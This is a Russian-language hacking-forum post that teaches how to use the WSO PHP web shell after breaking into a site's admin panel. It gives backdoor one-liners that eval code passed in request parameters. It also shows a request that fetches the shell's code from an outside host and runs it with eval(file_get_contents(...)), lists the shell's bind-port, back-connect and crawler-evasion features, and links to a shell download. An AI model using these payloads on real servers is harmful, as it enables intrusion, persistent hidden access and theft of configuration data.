WSO - Web Shell

DoBeRmАn

Школьник
Репутация
10 / 243
Не то чтобы статья, но многим будет полезна. Итак, мы проникли в админку, мы в итоге смогли хоть куда-то впихнуть такой код, примеру:

Код:
if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e']));
или просто:

Код:
assert(stripslashes($_REQUEST[lala]));
stripslashes в данном случае исключительно для обхода magic_quotes=ON
Многие вставляют
system($_GET['cmd']) и прочие безобразия, но это все лишнее, на самом деле все проще. Итак, вы вставили данный код куда-то (в faq.php, или у вас уже есть просто типо такой бекдор где-то в недрах скриптов сервера).
Т.е. в итоге вы к примеру добились работоспособности вот такого линка:
http://localhost/user.php?e=phpinfo();
И после этого у многих начинающих ступор. Немедленно следующий вопрос - а что же делать дальше?
А давайте повнимательнее взглянем на этот phpinfo, что нам вывело, основные два пункта, что нас будут интересовать в данной ситуации:
allow_url_fopen
allow_url_include


allow_url_include - да, жесть конечно, но, как правило, off.

Остается
allow_url_fopen, а он, как правило = ON. Как же мы может использовать данную возможность, безрассудно оставленную админом, чтобы не париться особо (не искать папки, доступные на запись и тому подобную ерунду выяснять да и вообще не заливать шелл как таковой, но лазить по серваку как-будто шелл уже залит). Да очень просто. Если
allow_url_fopen = ON и у вас есть код, выводящий хотя бы
PHPINFO(); то считайте вы уже прочитали все конфиги, слили все что вам надо и т.д. (не путайте с "порутать", только то, что можно прочитать)

Берем последний шелл от глубокоуважаемого oRb, удаляем первую строчку:

Код:
<?php # Web Shell by oRb
+
удаляем последнюю
?>
+
можно удалить пароль, шелл ведь не заливаем, просто юзаем, не оставляя

сохраняем на любой хост как bla_bla.txt (тот же narod.ru вполне подойдет) или в виде картинки на файлообменнике, предоставляющем прямые ссылки на скачку контента и делаем такой запрос:

Код:
http://localhost/user.php?a=eval(file_get_contents('[url]http://site.ru/bla_bla.txt'[/url]));
Всё. У вас полноценный шелл без физического его залития на сервак со всеми обычными возможностями шелла. Спасибо за внимание
PS: tested on WSO2.4 (wso2_pack.php)

Описание шелла:
Авторизация
Информация о сервере
Файловый менеджер (Копирование, переименование, перемещение, удаление, чмод, тач, создание файлов и папок)
Просмотр, hexview, редактирование, давнлоад, аплоад файлов
Работа с zip архивами (упаковка, распаковка)
Консоль
SQL менеджер (MySql, PostgreSql)
Выполнение PHP кода
Работа со строками + поиск хеша в онлайн базах
Биндпорт и бек-коннект (Perl)
Поиск текста в файлах
*nix/Windows
Из фишек
Антипоисковик (проверяется User-Agent, если поисковик, тогда возвращается 404 ошибка)
Консолька запоминает введенные команды. (перемещаться по ним можно с помощью стрелок вверх, вниз при фокусе на поле для ввода)
Можно использовать AJAX
Малый вес (24.32 KB)
Выбор кодировки, в которой работает шелл.

Данная утилита предоставляет веб-интерфейс для удаленной работы c операционной системой и ее службами/демонами.
Использование данного продукта в незаконных целях грозит уголовной ответственностью.

Автор шелла: oRb

WSO shell 2.5 :

Код:
http://narod.ru/disk/37941399001/wso_mod.zip.html
 

Похожие темы

Сверху